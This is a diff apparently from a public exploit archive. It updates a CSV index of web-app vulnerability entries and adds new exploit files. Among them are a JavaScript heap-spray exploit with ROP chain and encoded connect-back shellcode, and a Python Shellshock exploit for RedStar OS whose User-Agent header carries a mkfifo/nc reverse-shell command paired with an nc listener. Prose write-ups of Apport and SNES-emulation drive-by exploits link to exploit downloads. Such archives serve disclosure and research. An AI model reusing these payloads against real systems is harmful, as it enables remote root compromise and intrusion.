29715,platforms/php/webapps/29715.txt,"EPortfolio 1.0 - Client-Side Input Validation",2007-03-05,"Stefan Friedli",php,webapps,0
29722,platforms/php/webapps/29722.txt,"JCCorp URLShrink Free 1.3.1 - CreateURL.php Remote File Inclusion",2007-03-09,"Hasadya Raed",php,webapps,0
29726,platforms/asp/webapps/29726.pl,"Duyuru Scripti - Goster.asp SQL Injection",2007-03-09,Cr@zy_King,asp,webapps,0
29727,platforms/php/webapps/29727.txt,"Premod SubDog 2 - includes/functions_kb.php phpbb_root_path Parameter Remote File Inclusion",2007-03-10,"Hasadya Raed",php,webapps,0
@ -30969,7 +30974,7 @@ id,file,description,date,author,platform,type,port
30296,platforms/asp/webapps/30296.txt,"ActiveWeb Contentserver 5.6.2929 - Picture_Real_Edit.asp SQL Injection",2007-07-13,"RedTeam Pentesting",asp,webapps,0
30297,platforms/asp/webapps/30297.txt,"contentserver 5.6.2929 - errors/rights.asp msg Parameter Cross-Site Scripting",2007-07-13,"RedTeam Pentesting",asp,webapps,0
30298,platforms/asp/webapps/30298.txt,"contentserver 5.6.2929 - errors/transaction.asp msg Parameter Cross-Site Scripting",2007-07-13,"RedTeam Pentesting",asp,webapps,0
30299,platforms/php/webapps/30299.txt,"ActiveWeb Contentserver 5.6.2929 CMS - Client Side Filtering Bypass",2007-07-13,"RedTeam Pentesting",php,webapps,0
30299,platforms/php/webapps/30299.txt,"ActiveWeb Contentserver 5.6.2929 CMS - Client-Side Filtering Bypass",2007-07-13,"RedTeam Pentesting",php,webapps,0
30300,platforms/asp/webapps/30300.txt,"MzK Blog - Katgoster.asp SQL Injection",2007-03-23,GeFORC3,asp,webapps,0
30301,platforms/php/webapps/30301.txt,"Dating Gold 3.0.5 - header.php int_path Parameter Remote File Inclusion",2007-07-13,mostafa_ragab,php,webapps,0
30302,platforms/php/webapps/30302.txt,"Dating Gold 3.0.5 - footer.php int_path Parameter Remote File Inclusion",2007-07-13,mostafa_ragab,php,webapps,0
@ -31516,8 +31521,8 @@ id,file,description,date,author,platform,type,port
31700,platforms/php/webapps/31700.txt,"e107 CMS 0.7 - Multiple Cross-Site Scripting Vulnerabilities",2008-04-24,ZoRLu,php,webapps,0
31701,platforms/php/webapps/31701.txt,"Digital Hive 2.0 - 'base.php' Parameter Cross-Site Scripting",2008-04-24,ZoRLu,php,webapps,0
31173,platforms/php/webapps/31173.txt,"pChart 2.1.3 - Multiple Vulnerabilities",2014-01-24,"Balazs Makany",php,webapps,80
31174,platforms/php/webapps/31174.txt,"Joomla! Component 'com_komento' 1.7.2 - Persistent Cross-Site Scripting",2014-01-24,"High-Tech Bridge SA",php,webapps,80
31175,platforms/php/webapps/31175.txt,"Joomla! Component 'com_jvcomment' 3.0.2 - 'id' Parameter SQL Injection",2014-01-24,"High-Tech Bridge SA",php,webapps,80
31174,platforms/php/webapps/31174.txt,"Joomla! Component Komento 1.7.2 - Persistent Cross-Site Scripting",2014-01-24,"High-Tech Bridge SA",php,webapps,80
31175,platforms/php/webapps/31175.txt,"Joomla! Component JV Comment 3.0.2 - 'id' Parameter SQL Injection",2014-01-24,"High-Tech Bridge SA",php,webapps,80
31180,platforms/hardware/webapps/31180.txt,"Franklin Fueling TS-550 evo 2.0.0.6833 - Multiple Vulnerabilities",2014-01-24,"Trustwave's SpiderLabs",hardware,webapps,10001
31183,platforms/php/webapps/31183.txt,"Skybluecanvas CMS 1.1 r248-03 - Remote Command Execution",2014-01-24,"Scott Parish",php,webapps,80
31272,platforms/php/webapps/31272.txt,"Joomla! / Mambo Component 'com_Joomlavvz' - 'id' Parameter SQL Injection",2008-02-20,S@BUN,php,webapps,0
@ -33082,7 +33087,7 @@ id,file,description,date,author,platform,type,port
33840,platforms/asp/webapps/33840.txt,"Ziggurat Farsi CMS - 'bck' Parameter Directory Traversal",2010-04-15,"Pouya Daneshmand",asp,webapps,0
33857,platforms/php/webapps/33857.txt,"e107 0.7.x - 'e107_admin/banner.php' SQL Injection",2010-04-21,"High-Tech Bridge SA",php,webapps,0
33997,platforms/php/webapps/33997.txt,"NPDS REvolution 10.02 - 'download.php' Cross-Site Scripting",2010-05-18,"High-Tech Bridge SA",php,webapps,0
33998,platforms/php/webapps/33998.html,"Joomla! Component 'com_jcomments' 2.1 - 'ComntrNam' Parameter Cross-Site Scripting",2010-05-18,"High-Tech Bridge SA",php,webapps,0
33998,platforms/php/webapps/33998.html,"Joomla! Component JComments 2.1 - 'ComntrNam' Parameter Cross-Site Scripting",2010-05-18,"High-Tech Bridge SA",php,webapps,0
33846,platforms/php/webapps/33846.txt,"ZeroCMS 1.0 - 'zero_transact_article.php' SQL Injection",2014-06-23,"Filippos Mastrogiannis",php,webapps,0
33851,platforms/php/webapps/33851.txt,"Multiple WordPress Plugins (TimThumb 2.8.13 / WordThumb 1.07) - 'WebShot' Remote Code Execution",2014-06-24,@u0x,php,webapps,0
33854,platforms/php/webapps/33854.txt,"vBulletin Two-Step External Link Module - 'externalredirect.php' Cross-Site Scripting",2010-04-20,"Edgard Chammas",php,webapps,0
@ -33693,7 +33698,7 @@ id,file,description,date,author,platform,type,port
34812,platforms/php/webapps/34812.html,"Docebo 3.6 - 'description' Parameter Cross-Site Scripting",2010-10-04,"High-Tech Bridge SA",php,webapps,0
34813,platforms/php/webapps/34813.txt,"Elxis 2009.2 rev2631 - SQL Injection",2010-10-05,"High-Tech Bridge SA",php,webapps,0
34814,platforms/php/webapps/34814.txt,"SquirrelMail Virtual Keyboard Plugin - 'vkeyboard.php' Cross-Site Scripting",2010-10-05,"Moritz Naumann",php,webapps,0
34820,platforms/php/webapps/34820.pl,"Joomla! Component 'com_clubmanager' - 'cm_id' Parameter SQL Injection",2010-10-06,FL0RiX,php,webapps,0
34820,platforms/php/webapps/34820.pl,"Joomla! Component Club Manager - 'cm_id' Parameter SQL Injection",2010-10-06,FL0RiX,php,webapps,0
34817,platforms/windows/webapps/34817.rb,"Microsoft Exchange - IIS HTTP Internal IP Address Disclosure (Metasploit)",2014-09-29,"Nate Power",windows,webapps,0
34818,platforms/php/webapps/34818.html,"OpenFiler 2.99.1 - Cross-Site Request Forgery",2014-09-29,"Dolev Farhi",php,webapps,446
34975,platforms/php/webapps/34975.txt,"WordPress Plugin SEO Tools 3.0 - 'file' Parameter Directory Traversal",2010-11-08,"John Leitch",php,webapps,0
@ -33703,7 +33708,7 @@ id,file,description,date,author,platform,type,port
34828,platforms/php/webapps/34828.txt,"Backbone Technology Expression 18.9.2010 - Cross-Site Scripting",2010-10-06,"High-Tech Bridge SA",php,webapps,0
34833,platforms/php/webapps/34833.txt,"Joomla! / Mambo Component 'com_trade' - 'PID' Parameter Cross-Site Scripting",2010-10-11,FL0RiX,php,webapps,0
34834,platforms/jsp/webapps/34834.txt,"Oracle Fusion Middleware 10.1.2/10.1.3 - BPEL Console Cross-Site Scripting",2010-10-12,"Alexander Polyakov",jsp,webapps,0
34837,platforms/php/webapps/34837.txt,"Joomla! Component 'com_jstore' - 'Controller' Parameter Local File Inclusion",2010-10-13,jos_ali_joe,php,webapps,0
34837,platforms/php/webapps/34837.txt,"Joomla! Component Jstore - 'Controller' Parameter Local File Inclusion",2010-10-13,jos_ali_joe,php,webapps,0
34839,platforms/cgi/webapps/34839.py,"IPFire - Cgi Web Interface Authenticated Bash Environment Variable Code Injection",2014-10-01,"Claudio Viviani",cgi,webapps,0
34840,platforms/php/webapps/34840.txt,"Ronny CMS 1.1 r935 - Multiple HTML Injection Vulnerabilities",2010-10-13,"High-Tech Bridge SA",php,webapps,0
34841,platforms/php/webapps/34841.txt,"PluXml 5.0.1 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2010-10-13,"High-Tech Bridge SA",php,webapps,0
@ -34685,7 +34690,7 @@ id,file,description,date,author,platform,type,port
36434,platforms/php/webapps/36434.txt,"WordPress Plugin GRAND FlAGallery 1.57 - 'flagshow.php' Cross-Site Scripting",2011-12-12,Am!r,php,webapps,0
36435,platforms/php/webapps/36435.txt,"Chamilo LMS 1.9.10 - Multiple Vulnerabilities",2015-03-19,"Rehan Ahmed",php,webapps,80
36436,platforms/java/webapps/36436.txt,"EMC M&R (Watch4net) - Credential Disclosure",2015-03-19,"Han Sahin",java,webapps,0
36439,platforms/php/webapps/36439.txt,"Joomla! Component 'com_ecommercewd' 1.2.5 - SQL Injection",2015-03-19,"Brandon Perry",php,webapps,80
36439,platforms/php/webapps/36439.txt,"Joomla! Component ECommerce-WD 1.2.5 - SQL Injection",2015-03-19,"Brandon Perry",php,webapps,80
36440,platforms/java/webapps/36440.txt,"EMC M&R (Watch4net) - Directory Traversal",2015-03-19,"Han Sahin",java,webapps,58080
36441,platforms/xml/webapps/36441.txt,"Citrix Command Center - Credential Disclosure",2015-03-19,"Han Sahin",xml,webapps,8443
36442,platforms/linux/webapps/36442.txt,"Citrix Nitro SDK - Command Injection",2015-03-19,"Han Sahin",linux,webapps,0
@ -34768,7 +34773,7 @@ id,file,description,date,author,platform,type,port
36554,platforms/php/webapps/36554.txt,"WordPress Plugin Slider REvolution 4.1.4 - Arbitrary File Download",2015-03-30,"Claudio Viviani",php,webapps,0
36559,platforms/php/webapps/36559.txt,"WordPress Plugin aspose-doc-exporter 1.0 - Arbitrary File Download",2015-03-30,ACC3SS,php,webapps,0
36560,platforms/php/webapps/36560.txt,"Joomla! Component 'com_gallery_wd' - SQL Injection",2015-03-30,CrashBandicot,php,webapps,0
36561,platforms/php/webapps/36561.txt,"Joomla! Component 'com_contactformmaker' 1.0.1 - SQL Injection",2015-03-30,"TUNISIAN CYBER",php,webapps,0
36561,platforms/php/webapps/36561.txt,"Joomla! Component Contact Form Maker 1.0.1 - SQL Injection",2015-03-30,"TUNISIAN CYBER",php,webapps,0
36565,platforms/php/webapps/36565.txt,"ATutor 2.0.3 - Multiple Cross-Site Scripting Vulnerabilities",2012-01-16,"Stefan Schurtz",php,webapps,0
36566,platforms/php/webapps/36566.txt,"Beehive Forum 101 - Multiple Cross-Site Scripting Vulnerabilities",2012-01-16,"Stefan Schurtz",php,webapps,0
36567,platforms/php/webapps/36567.txt,"phpVideoPro 0.8.x/0.9.7 - Multiple Cross-Site Scripting Vulnerabilities",2012-01-16,"Stefan Schurtz",php,webapps,0
@ -34796,7 +34801,7 @@ id,file,description,date,author,platform,type,port
36595,platforms/php/webapps/36595.txt,"Joomla! Component 'com_car' - Multiple SQL Injections",2012-01-21,the_cyber_nuxbie,php,webapps,0
36596,platforms/php/webapps/36596.txt,"Joomla! Component 'com_some' - 'Controller' Parameter Local File Inclusion",2012-01-21,the_cyber_nuxbie,php,webapps,0
36597,platforms/php/webapps/36597.txt,"Joomla! Component 'com_bulkenquery' - 'Controller' Parameter Local File Inclusion",2012-01-21,the_cyber_nuxbie,php,webapps,0
36598,platforms/php/webapps/36598.txt,"Joomla! Component 'com_kp' - 'Controller' Parameter Local File Inclusion",2012-01-21,the_cyber_nuxbie,php,webapps,0
36598,platforms/php/webapps/36598.txt,"Joomla! Component com_kp - 'Controller' Parameter Local File Inclusion",2012-01-21,the_cyber_nuxbie,php,webapps,0
36599,platforms/asp/webapps/36599.txt,"Raven 1.0 - 'connector.asp' Arbitrary File Upload",2012-01-21,HELLBOY,asp,webapps,0
36600,platforms/php/webapps/36600.txt,"WordPress Plugin Business Intelligence - SQL Injection (Metasploit)",2015-04-02,"Jagriti Sahu",php,webapps,80
36601,platforms/php/webapps/36601.txt,"Joomla! Component 'com_rand' - SQL Injection",2015-04-02,"Jagriti Sahu",php,webapps,80
@ -35525,7 +35530,7 @@ id,file,description,date,author,platform,type,port
37656,platforms/php/webapps/37656.txt,"PHP Web Scripts Ad Manager Pro - 'page' Parameter Local File Inclusion",2012-08-23,"Corrado Liotta",php,webapps,0
37659,platforms/php/webapps/37659.txt,"phpVibe < 4.20 - Persistent Cross-Site Scripting",2015-07-20,"Filippos Mastrogiannis",php,webapps,0
37662,platforms/multiple/webapps/37662.txt,"AirDroid iOS / Android / Win 3.1.3 - Persistent Exploit",2015-07-20,Vulnerability-Lab,multiple,webapps,0
37666,platforms/php/webapps/37666.txt,"Joomla! Component 'com_helpdeskpro' < 1.4.0 - Multiple Vulnerabilities",2015-07-21,"Simon Rawet",php,webapps,80
37666,platforms/php/webapps/37666.txt,"Joomla! Component Helpdesk Pro < 1.4.0 - Multiple Vulnerabilities",2015-07-21,"Simon Rawet",php,webapps,80
37672,platforms/php/webapps/37672.txt,"JW Player - 'logo.link' Parameter Cross-Site Scripting",2012-08-29,MustLive,php,webapps,0
37674,platforms/php/webapps/37674.txt,"PHP Web Scripts Text Exchange Pro - 'page' Parameter Local File Inclusion",2012-08-24,"Yakir Wizman",php,webapps,0
37675,platforms/php/webapps/37675.txt,"Joomla! Component 'Komento' - 'cid' Parameter SQL Injection",2012-08-27,Crim3R,php,webapps,0
@ -36891,3 +36896,7 @@ id,file,description,date,author,platform,type,port
40912,platforms/php/webapps/40912.txt,"Joomla! Component DT Register - 'cat' Parameter SQL Injection",2016-12-13,"Elar Lang",php,webapps,80
40932,platforms/php/webapps/40932.txt,"WHMCS Addon VMPanel 2.7.4 - SQL Injection",2016-12-16,ZwX,php,webapps,80
40934,platforms/php/webapps/40934.html,"WordPress Plugin Quiz And Survey Master 4.5.4 / 4.7.8 - Cross-Site Request Forgery",2016-12-16,dxw,php,webapps,80
40939,platforms/php/webapps/40939.txt,"Wordpress Plugin WP Support Plus Responsive Ticket System 7.1.3 - SQL Injection",2016-12-16,"Lenon Leite",php,webapps,0
40940,platforms/php/webapps/40940.txt,"Wordpress Plugin WP Private Messages 1.0.1 - SQL Injection",2016-12-16,"Lenon Leite",php,webapps,0
40941,platforms/php/webapps/40941.txt,"WordPress Plugin 404 Redirection Manager 1.0 - SQL Injection",2016-12-19,"Ahmed Sherif",php,webapps,0
40942,platforms/multiple/webapps/40942.py,"ntop-ng 2.5.160805 - Username Enumeration",2016-08-04,"Dolev Farhi",multiple,webapps,0

Can't render this file because it is too large.

2
platforms/hardware/remote/40619.py
View file

@ -27,8 +27,6 @@
# -- Hacker Fantastic
#
# (https://www.myhackerhouse.com)
import SimpleHTTPServer
import subprocess
import requests
import sys
import os

112
platforms/linux/local/40936.html Executable file
View file

@ -0,0 +1,112 @@
<!--
Download: https://github.com/HackerFantastic/Public/blob/master/exploits/jackrabbit.tgz
Mirror: //github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40936.tgz
-->
<html>
<head>
<div id="content">
<p>
<FONT>
</FONT>
</p>
<p>
<FONT>n0m3rcYn0M3rCyn0m3Rc</FONT></p>
<p>
<FONT>N0MeRCYn0m3rCyn0m3rCyn0m</FONT>
</p>
<p>
<FONT>n0MERCypDK </FONT>
</p>
</div>
<script language="JavaScript">
var xunescape = unescape;
oneblock = xunescape("%u0040%u1000");
stackpivot = xunescape("%u6885%u0805%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u5a91%u0805%u4141%u4141");
nopsled = xunescape("%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568");
ropgadget = xunescape("%udc08%u0490%ua408%u04bd%u0008%u0200%u0000%u0f00%u0700%u0000%u2200%u0000%u0000%u0000%u0000%u0000%uec00%u0491%u0008%u0200%u0000%u0200%uc100%u10e3%u0040%u0010%u0000%u0200%u9000")
<!-- connect back ("192.168.0.10,80") ffff = port, 01020304 = ipaddr "%udc08%u0490%ua408%u04bd%u0008%u0200%u0000%u0f00%u0700%u0000%u2200%u0000%u0000%u0000%u0000%u0000%uec00%u0491%u0008%u0200%u0000%u0200%uc100%u10e3%u0040%u0010%u0000%u0200%u9000%u9090%u9090%u9090%u9090%u9090%u3190%u53db%u5343%u026a%u666a%u8958%ucde1%u9380%ub059%ucd3f%u4980%uf979%u5a5b%u0168%u0302%u6604%uff68%u43ff%u5366%ue189%u66b0%u5150%u8953%u43e1%u80cd%u6852%u2f2f%u6873%u2f68%u6962%u896e%u52e3%u8953%ub0e1%ucd0b%u0080%u6568%u7061%u6120%u6464%u3a72%u2520%u3830%u0a78%u7200%u6e75%u696e%u676e%u6620%u6f72%u206d%u6568%u2061" -->
shellcode = xunescape("%u9090%u9090%u9090%u9090%u9090%u3190%u53db%u5343%u026a%u666a%u8958%ucde1%u9380%ub059%ucd3f%u4980%uf979%u5a5b%uc068%u00a8%u660a%u0068%u4350%u5366%ue189%u66b0%u5150%u8953%u43e1%u80cd%u6852%u2f2f%u6873%u2f68%u6962%u896e%u52e3%u8953%ub0e1%ucd0b%u0080%u6568%u7061%u6120%u6464%u3a72%u2520%u3830%u0a78%u7200%u6e75%u696e%u676e%u6620%u6f72%u206d%u6568%u2061");
var fullblock = oneblock;
while (fullblock.length < 393216)
{
fullblock += fullblock;
}
var sprayContainer = new Array();
var sprayready = false;
var sprayContainerIndex = 0;
function fill_function()
{
if(! sprayready) {
for (xi=0; xi<800/100; xi++, sprayContainerIndex++)
{
sprayContainer[sprayContainerIndex] = fullblock + stackpivot + oneblock + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + ropgadget + shellcode;
}
} else {
DataTranslator();
GenerateHTML();
}
if(sprayContainer.length >= 1000) {
sprayready = true;
}
}
var searchArray = new Array();
function escapeData(data)
{
var xi;
var xc;
var escData='';
for(xi=0; xi<data.length; xi++)
{
xc=data.charAt(xi);
if(xc=='&' || xc=='?' || xc=='=' || xc=='%' || xc==' ') xc = escape(xc);
escData+=xc;
}
return escData;
}
function DataTranslator()
{
searchArray = new Array();
searchArray[0] = new Array();
searchArray[0]["dac"] = "Kros";
var newElement = document.getElementById("content");
if (document.getElementsByTagName) {
var xi=0;
pTags = newElement.getElementsByTagName("p");
if (pTags.length > 0)
while (xi < pTags.length)
{
oTags = pTags[xi].getElementsByTagName("font");
searchArray[xi+1] = new Array();
if (oTags[0]) {
searchArray[xi+1]["dac"] = oTags[0].innerHTML;
}
xi++;
}
}
}
function GenerateHTML()
{
var xhtml = "";
for (xi=1;xi<searchArray.length;xi++)
{
xhtml += escapeData(searchArray[xi]["dac"]);
}
}
setInterval("fill_function()", .5);
</script>
</body>
</html>

16
platforms/linux/local/40937.txt Executable file
View file

@ -0,0 +1,16 @@
Both of these issues were reported to the Apport maintainers and a fix was released on 2016-12-14. The CrashDB code injection issue can be tracked with CVE-2016-9949 and the path traversal bug with CVE-2016-9950. An additional problem where arbitrary commands can be called with the “Relaunch” action is tracked by CVE-2016-9951. Id like to thank Martin Pitt and the Ubuntu security team for getting a fix (https://bugs.launchpad.net/apport/+bug/1648806) released so quickly. They have been a pleasure to work with.
I would encourage all security researchers to audit free and open source software if they have time on their hands. Projects such as Tor, Tails, Debian and Ubuntu all need more eyes for audits which can improve the safety of the internet for everyone. There are lots of bugs out there which dont need hardcore memory corruption exploitation skills. Logic bugs can be much more reliable than any ROP chain.
The computer security industry has a serious conflict of interest right now. There is major financial motivation for researchers to find and disclose vulnerability to exploit brokers. Many of the brokers are in the business of keeping problems unfixed. Code execution bugs are valuable. As a data point, I received an offer of more than 10,000 USD from an exploit vendor for these Apport bugs. These financial motivators are only increasing as software gets more secure and bugs become more difficult to find.
To improve security for everyone we need to find sustainable ways to incentivize researchers to find and disclose issues and to get bugs fixed. We cant and we shouldnt rely on researchers giving away their work for free to for-profit vendors. We will not get security like that.
Microsoft and Google have shown a good example with their vulnerability reward programs. The Internet Bug Bounty (https://internetbugbounty.org/) is also doing great work and helping to support research on critical internet software. I hope that they can continue the program and expand their scope in the future. I hope we can cooperatively build a shared and secure internet together.
Source: https://donncha.is/2016/12/compromising-ubuntu-desktop/
Download: https://github.com/DonnchaC/ubuntu-apport-exploitation/archive/6ecfdf798f39fdd49b5929240d90a876c1e97ebb.zip
Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40937.zip

57
platforms/linux/local/40938.py Executable file
View file

@ -0,0 +1,57 @@
#!/usr/bin/env python
# RedStar OS 3.0 Server (BEAM & RSSMON) shellshock exploit
# ========================================================
# BEAM & RSSMON are Webmin based configuration utilities
# that ship with RSS server 3.0. These packages are the
# recommended GUI configuration components and listen on
# a user specified port from 10000/tcp to 65535/tcp. They
# are accessible on the local host only in vanilla install
# unless the firewall is disabled. Both services run with
# full root permissions and can be exploited for LPE or
# network attacks. RSSMON has hardened SELinux policies
# applied which hinder exploitation of this vulnerability
# be limiting access to network resources. Commands are
# still run as root in a blind way.
#
# $ python rsshellshock.py beam 192.168.0.31 10000 192.168.0.10 8080
# [+] RedStar OS 3.0 Server (BEAM & RSSMON) shellshock exploit
# [-] exploiting shellshock CVE-2014-6271...
# sh: no job control in this shell
# sh-4.1# id
# uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:beam_t:s0-s15:c0.c1023
# sh-4.1#
#
# -- Hacker Fantastic (https://myhackerhouse.com)
from requests.packages.urllib3.exceptions import InsecureRequestWarning
import subprocess
import requests
import sys
import os
def spawn_shell(cbport):
subprocess.call('nc -l ' + cbport, shell=True)
def shellshock(soft,ip,port,cbip,cbport):
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
if soft == "beam":
user_agent = {'User-agent': '() { :; }; /bin/bash -c "rm /tmp/.f;mkfifo /tmp/.f;cat /tmp/.f|/bin/sh -i 2>&1|nc '+cbip+' '+cbport+' >/tmp/.f"'}
else:
shellstring = '() { :; }; /bin/bash -c "%s"' % (cbip)
user_agent = {'User-agent': shellstring}
print "[-] exploiting shellshock CVE-2014-6271..."
myreq = requests.get("https://"+ip+":"+port+"/session_login.cgi", headers = user_agent, verify=False)
if __name__ == "__main__":
print "[+] RedStar OS 3.0 Server (BEAM & RSSMON) shellshock exploit"
if len(sys.argv) < 5:
print "[-] Use with <beam> <host> <port> <connectback ip> <connectback port>"
print "[-] Or with <rssmon> <host> <port> <cmd>"
sys.exit()
if(sys.argv[1]=="beam"):
newRef=os.fork()
if newRef==0:
shellshock(sys.argv[1],sys.argv[2],sys.argv[3],sys.argv[4],sys.argv[5])
else:
spawn_shell(sys.argv[5])
else:
shellshock(sys.argv[1],sys.argv[2],sys.argv[3],sys.argv[4],0)

38
platforms/linux/local/40943.txt Executable file
View file

@ -0,0 +1,38 @@
## Overview
Full reliable 0day drive-by exploit against Fedora 25 + Google Chrome, by breaking out of Super Nintendo Entertainment System emulation via cascading side effects from a subtle and interesting emulation error.
I had a lot of fun compromising the Linux desktop using 6502 opcodes on the original Nintendo NES (https://scarybeastsecurity.blogspot.com/2016/11/0day-exploit-compromising-linux-desktop.html). Would it be possible to have even more fun? Why, yes it would! My previous NES related exploit suffered from multiple fun-limiting issues:
- Although it was a genuine 0day exploit, it only affected very old Linux distributions. Something affecting bang up to date Linux installs would generate greater lulz.
- The vulnerability that was abused -- a total lack of bounds checking on memory bank mapping -- was somewhat obvious. More fun can often be had with vulnerabilities that are slightly more subtle.
- The lack of “super”! The Super Nintendo Entertainment System (SNES) is even more iconic than the original NES. Regarding its 1990 release, Wikipedia notes (https://en.wikipedia.org/wiki/Super_Nintendo_Entertainment_System) "the resulting social disturbance led the Japanese government to ask video game manufacturers to schedule future console releases on weekends". So we need more Super.
Resolving all the above, I present here a full, working, reliable, 0day exploit for current Linux distributions (Ubuntu 16.04 LTS and Fedora 25). Its a full drive-by download in the context of Fedora. It abuses cascading subtle side effects of an emulation misstep that at first appears extremely difficult to exploit but ends up presenting beautiful and 100% reliable exploitation possibilities.
Youve likely guessed it by now, but the Linux gstreamer media playback framework supports playback of SNES music files by…. emulating the SNES CPU and audio processor, courtesy of Game Music Emu (http://www.slack.net/~ant/libs/audio.html). How cool is that?
- - -
## Demo and impact
Today, the demos are videos instead of images. This first video shows a full, reliable drive-by download against Fedora 25 + Google Chrome. The strong reliability of this exploit makes it work inside Fedoras tracker-extract process, which has highly variable heap state that has frustrated my other exploit attempts. Finally, decent exploit proof of my earlier suspicion that tracker + Google Chrome is very dangerous (https://scarybeastsecurity.blogspot.com/2016/11/0day-poc-risky-design-decisions-in.html):
- https://www.youtube.com/watch?v=WKwRijjqdzY
Exploit file: gnome_calc_fedora_25_libc_2.24-3.spc (rename it to .flac to get it to work as in the video).
- Download: https://security.appspot.com/security/spc/gnome_calc_fedora_25_libc_2.24-3.spc
- Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40943-1.flac
And this second video shows a couple of different exploitation contexts in Ubuntu 16.04 LTS, using the same exploit file for each. Again, this is showcasing the reliability that the underlying vulnerability permits. The different exploited processes (gnome-video-thumbnailer and totem) have very different heap and threading setups:
- https://www.youtube.com/watch?v=wrCLoem6ggM
Exploit file: xcalc_ubuntu_16.04_libc_2.23-0ubuntu3.spc (rename it to .mp3 to get it to work as in the video).
